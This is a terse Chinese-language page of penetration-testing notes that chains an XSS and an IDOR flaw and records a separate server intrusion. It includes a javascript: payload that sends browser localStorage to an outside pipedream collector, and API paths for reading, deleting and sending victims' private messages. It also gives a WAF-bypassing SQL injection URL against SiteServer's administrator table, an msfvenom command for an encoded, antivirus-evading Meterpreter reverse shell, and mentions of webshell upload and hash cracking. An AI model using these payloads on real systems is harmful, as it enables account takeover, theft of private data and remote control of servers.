随手记
xss
idor 修改任何用户的个人资料详细信息
打造漏洞利用链
应用程序没有 cookie,但将签名值存储在浏览器 localStorage 中,因此我们将制作有效负载来窃取该签名值
javascript:token=JSON.stringify(localStorage),url='<https://mypipedream.m.pipedream.net/'+token,fetch(url)
>jsonp 获得用户的AccessToken和UID值
Authorization: bearer xxxxxxxxxxxxxxxxxxxxx 添加 header 进行越权
从用户帐户读取/删除/发送消息的概念验证
/api/communication-service/conversation?showHidden=true
阅读用户所有私信
/api/communication-service/conversation/CONVERSATION-ID/message
重放以下请求以从用户帐户中获取与特定参与者的对话(将ACCOUNT-ID 替换为为 accountid )
/api/communication-service/conversation?participantIds=ACCOUNT-ID&showHidden=true
删除用户所有私信
/api/communication-service/conversation/CONVERSATION-ID/message/637712054644701721
向任何人发送消息
/api/communication-service/conversation
查找siteserver对应漏洞,sql 注入,有 waf
加“~”过防护,语句,最终的绕狗语句,查询用户。
<http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27>)%20and%20~1=(select%20top%201%20username%20from%20[bairong_Administrator]);%20--
寻找加解密算法程序
找回密码漏洞
过狗上线菜刀
提权web服务器
MSF免杀上线
修改编译次数,重新生成免杀。终于获得到hash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=2333 -e x86/shikata_ga_nai -i 14 -f csharp -o payload.txt
为什么是破解而不是直接导出明文账户密码呢?
因为在win ser2012之后都默认不能导出。
一般是通过修改注册列表,重启之后等管理员登录才可以抓到。
这里我们出了用在线网站破解。也可以使用hashcat来破解